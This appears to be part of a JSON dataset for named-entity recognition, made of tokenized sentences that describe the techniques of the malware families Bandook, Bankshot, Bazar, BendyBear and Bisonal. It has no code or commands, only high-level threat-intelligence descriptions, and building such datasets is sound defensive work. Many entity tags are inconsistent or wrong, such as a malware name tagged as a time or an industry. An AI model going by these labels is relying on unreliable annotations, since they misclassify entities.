"tokens": [ - "Bandook", - "has", - "used", - "the", - "ShellExecuteW()", - "function", - "call." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "a", - "command", - "built", - "in", - "to", - "use", - "a", - "raw", - "TCP", - "socket." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "detect", - "USB", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "used", - "PowerShell", - "loaders", - "as", - "part", - "of", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "been", - "launched", - "by", - "starting", - "iexplore.exe", - "and", - "replacing", - "it", - "with", - "Bandook's", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "support", - "commands", - "to", - "execute", - "Python-based", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "is", - "capable", - "of", - "taking", - "an", - "image", - "of", - "and", - "uploading", - "the", - "current", - "desktop." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "is", - "delivered", - "via", - "a", - "malicious", - "Word", - "document", - "inside", - "a", - "zip", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "used", - ".PNG", - "images", - "within", - "a", - "zip", - "file", - "to", - "build", - "the", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "used", - "AES", - "encryption", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "collect", - "information", - "about", - "the", - "drives", - "available", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "a", - "command", - "to", - "get", - "the", - "public", - "IP", - "address", - "from", - "a", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "modules", - "that", - "are", - "capable", - "of", - "capturing", - "video", - "from", - "a", - "victim's", - "webcam." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "used", - "malicious", - "VBA", - "code", - "against", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "is", - "capable", - "of", - "spawning", - "a", - "Windows", - "command", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "recursively", - "generates", - "a", - "list", - "of", - "files", - "within", - "a", - "directory", - "and", - "sends", - "them", - "back", - "to", - "the", - "control", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "grabs", - "a", - "user", - "token", - "using", - "WTSQueryUserToken", - "and", - "then", - "creates", - "a", - "process", - "by", - "impersonating", - "a", - "logged-on", - "user." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "collects", - "files", - "from", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "decodes", - "embedded", - "XOR", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "gathers", - "domain", - "and", - "account", - "names/information", - "through", - "process", - "monitoring." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "exfiltrates", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "leverages", - "a", - "known", - "zero-day", - "vulnerability", - "in", - "Adobe", - "Flash", - "to", - "execute", - "the", - "implant", - "into", - "the", - "victims’", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "marks", - "files", - "to", - "be", - "deleted", - "upon", - "the", - "next", - "system", - "reboot", - "and", - "uninstalls", - "and", - "removes", - "itself", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "searches", - "for", - "files", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "deletes", - "all", - "artifacts", - "associated", - "with", - "the", - "malware", - "from", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "uploads", - "files", - "and", - "secondary", - "payloads", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "gathers", - "domain", - "and", - "account", - "names/information", - "through", - "process", - "monitoring." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "writes", - "data", - "into", - "the", - "Registry", - "key", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Bankshot", - "creates", - "processes", - "using", - "the", - "Windows", - "API", - "calls:", - "CreateProcessA()", - "and", - "CreateProcessAsUserA()." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Bankshot", - "encodes", - "commands", - "from", - "the", - "control", - "server", - "using", - "a", - "range", - "of", - "characters", - "and", - "gzip." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "binds", - "and", - "listens", - "on", - "port", - "1058", - "for", - "HTTP", - "traffic", - "while", - "also", - "utilizing", - "a", - "FakeTLS", - "method." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "identifies", - "processes", - "and", - "collects", - "the", - "process", - "ids." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "generates", - "a", - "false", - "TLS", - "handshake", - "using", - "a", - "public", - "certificate", - "to", - "disguise", - "C2", - "network", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "searches", - "for", - "certain", - "Registry", - "keys", - "to", - "be", - "configured", - "before", - "executing", - "the", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "gathers", - "system", - "information,", - "network", - "addresses,", - "disk", - "type,", - "disk", - "free", - "space,", - "and", - "the", - "operation", - "system", - "version." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "modifies", - "the", - "time", - "of", - "a", - "file", - "as", - "specified", - "by", - "the", - "control", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "uses", - "HTTP", - "for", - "command", - "and", - "control", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "uses", - "the", - "command-line", - "interface", - "to", - "execute", - "arbitrary", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Bankshot", - "can", - "terminate", - "a", - "specific", - "process", - "by", - "its", - "process", - "id." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "use", - "TLS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "been", - "downloaded", - "via", - "Windows", - "BITS", - "functionality." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar's", - "loader", - "can", - "delete", - "scheduled", - "tasks", - "created", - "by", - "a", - "previous", - "instance", - "of", - "the", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "been", - "signed", - "with", - "fake", - "certificates", - "including", - "those", - "appearing", - "to", - "be", - "from", - "VB", - "CORPORATE", - "PTY.", - "LTD." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "retrieve", - "information", - "from", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "decrypt", - "downloaded", - "payloads.", - "Bazar", - "also", - "resolves", - "strings", - "and", - "other", - "artifacts", - "at", - "runtime." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "manually", - "loaded", - "ntdll", - "from", - "disk", - "in", - "order", - "to", - "identity", - "and", - "remove", - "API", - "hooks", - "set", - "by", - "security", - "products." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "the", - "ability", - "to", - "identify", - "domain", - "administrator", - "accounts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "implement", - "DGA", - "using", - "the", - "current", - "date", - "as", - "a", - "seed", - "variable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "use", - "Nltest", - "tools", - "to", - "obtain", - "information", - "about", - "the", - "domain." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Bazar", - "loader", - "has", - "used", - "dual-extension", - "executable", - "files", - "such", - "as", - "PreviewReport.DOC.exe." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "hash", - "then", - "resolve", - "API", - "calls", - "at", - "runtime." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "used", - "XOR,", - "RSA2,", - "and", - "RC4", - "encrypted", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "the", - "ability", - "to", - "use", - "an", - "alternative", - "C2", - "server", - "if", - "the", - "primary", - "server", - "fails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "delete", - "its", - "loader", - "using", - "a", - "batch", - "file", - "in", - "the", - "Windows", - "temporary", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "enumerate", - "the", - "victim's", - "desktop." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "download", - "and", - "deploy", - "additional", - "payloads,", - "including", - "ransomware", - "and", - "post-exploitation", - "frameworks", - "such", - "as", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "identify", - "administrator", - "accounts", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "gain", - "execution", - "after", - "a", - "user", - "clicks", - "on", - "a", - "malicious", - "link", - "to", - "decoy", - "landing", - "pages", - "hosted", - "on", - "Google", - "Docs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "create", - "a", - "task", - "named", - "to", - "appear", - "benign." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Bazar", - "loader", - "has", - "named", - "malicious", - "shortcuts", - "\"adobe\"", - "and", - "mimicked", - "communications", - "software." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Bazar", - "loader", - "is", - "used", - "to", - "download", - "and", - "execute", - "the", - "Bazar", - "backdoor." - ], - "ner_tags": [ - "O", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "use", - "various", - "APIs", - "to", - "allocate", - "memory", - "and", - "facilitate", - "code", - "execution/injection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "enumerate", - "shared", - "drives", - "on", - "the", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "execute", - "a", - "PowerShell", - "script", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "identity", - "the", - "current", - "process", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "inject", - "into", - "a", - "target", - "process", - "using", - "process", - "doppelgänging." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "inject", - "into", - "a", - "target", - "process", - "including", - "Svchost,", - "Explorer,", - "and", - "cmd", - "using", - "process", - "hollowing." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "inject", - "code", - "through", - "calling", - "<code>VirtualAllocExNuma</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "query", - "<code>Windows\\CurrentVersion\\Uninstall</code>", - "for", - "installed", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "create", - "or", - "add", - "files", - "to", - "Registry", - "Run", - "Keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "enumerate", - "remote", - "systems", - "using", - "<code>", - "Net", - "View</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "create", - "a", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "identify", - "the", - "installed", - "antivirus", - "engine." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "establish", - "persistence", - "by", - "writing", - "shortcuts", - "to", - "the", - "Windows", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "query", - "the", - "Registry", - "for", - "installed", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "a", - "variant", - "with", - "a", - "packed", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "has", - "been", - "spread", - "via", - "emails", - "with", - "embedded", - "malicious", - "links." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "send", - "C2", - "communications", - "with", - "XOR", - "encryption." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "fingerprint", - "architecture,", - "computer", - "name,", - "and", - "OS", - "version", - "on", - "the", - "compromised", - "host.", - "Bazar", - "can", - "also", - "check", - "if", - "the", - "Russian", - "language", - "is", - "installed", - "on", - "the", - "infected", - "machine", - "and", - "terminate", - "if", - "it", - "is", - "found." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "perform", - "a", - "check", - "to", - "ensure", - "that", - "the", - "operating", - "system's", - "keyboard", - "and", - "language", - "settings", - "are", - "not", - "set", - "to", - "Russian." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "collect", - "the", - "IP", - "address", - "and", - "NetBIOS", - "name", - "of", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "identify", - "the", - "username", - "of", - "the", - "infected", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "collect", - "the", - "time", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "use", - "a", - "timer", - "to", - "delay", - "execution", - "of", - "core", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "attempt", - "to", - "overload", - "sandbox", - "analysis", - "by", - "sending", - "1550", - "calls", - "to", - "<code>printf</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "over", - "ports", - "80", - "and", - "443", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "downloads", - "have", - "been", - "hosted", - "on", - "Google", - "Docs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "launch", - "cmd.exe", - "to", - "perform", - "reconnaissance", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "execute", - "a", - "WMI", - "query", - "to", - "gather", - "information", - "about", - "the", - "installed", - "antivirus", - "engine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bazar", - "can", - "use", - "Winlogon", - "Helper", - "DLL", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "has", - "decrypted", - "function", - "blocks", - "using", - "a", - "XOR", - "key", - "during", - "runtime", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "has", - "encrypted", - "payloads", - "using", - "RC4", - "and", - "XOR." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "BendyBear", - "is", - "designed", - "to", - "download", - "an", - "implant", - "from", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "has", - "used", - "byte", - "randomization", - "to", - "obscure", - "its", - "behavior." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "can", - "load", - "and", - "execute", - "modules", - "and", - "Windows", - "Application", - "Programming", - "(API)", - "calls", - "using", - "standard", - "shellcode", - "API", - "hashing." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "has", - "used", - "a", - "custom", - "RC4", - "and", - "XOR", - "encrypted", - "protocol", - "over", - "port", - "443", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "can", - "query", - "the", - "host's", - "Registry", - "key", - "at", - "<code>HKEY_CURRENT_USER\\Console\\QuickEdit</code>", - "to", - "retrieve", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "communicates", - "to", - "a", - "C2", - "server", - "over", - "port", - "443", - "using", - "modified", - "RC4", - "and", - "XOR-encrypted", - "chunks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "has", - "the", - "ability", - "to", - "determine", - "local", - "time", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BendyBear", - "can", - "check", - "for", - "analysis", - "environments", - "and", - "signs", - "of", - "debugging", - "using", - "the", - "Windows", - "API", - "<code>kernel32!GetTickCountKernel32</code>", - "call." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "been", - "loaded", - "through", - "a", - "`.wll`", - "extension", - "added", - "to", - "the", - "`", - "%APPDATA%\\microsoft\\word\\startup\\`", - "repository." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "appended", - "random", - "binary", - "data", - "to", - "the", - "end", - "of", - "itself", - "to", - "generate", - "a", - "large", - "binary." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "collected", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "decoded", - "strings", - "in", - "the", - "malware", - "using", - "XOR", - "and", - "RC4." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "a", - "dynamic", - "DNS", - "service", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - 